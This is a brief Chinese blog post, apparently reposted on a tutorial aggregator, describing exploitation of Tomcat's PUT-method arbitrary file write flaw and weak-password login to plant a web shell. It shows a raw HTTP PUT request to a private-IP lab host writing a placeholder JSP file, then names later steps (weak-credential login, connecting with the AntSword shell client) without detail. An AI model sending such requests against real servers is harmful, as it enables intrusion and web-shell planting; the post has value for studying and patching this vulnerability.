tomcat put方法任意写文件漏洞、弱口令并进行挂马
2022/4/18 6:15:09
本文主要是介绍tomcat put方法任意写文件漏洞、弱口令并进行挂马,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
POC
直接发送以下数据包,然后将外壳程序写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: 192.168.52.154:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
通过弱口令漏洞进行登录
通过蚁剑进行连接
连接成功
这篇关于tomcat put方法任意写文件漏洞、弱口令并进行挂马的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign学习入门:轻松掌握微服务通信
- 2024-12-27OpenFeign学习入门:轻松掌握微服务间的HTTP请求
- 2024-12-27JDK17新特性学习入门:简洁教程带你轻松上手
- 2024-12-27JMeter传递token学习入门教程
- 2024-12-27JMeter压测学习入门指南
- 2024-12-27JWT单点登录学习入门指南
- 2024-12-27JWT单点登录原理学习入门
- 2024-12-27JWT单点登录原理学习入门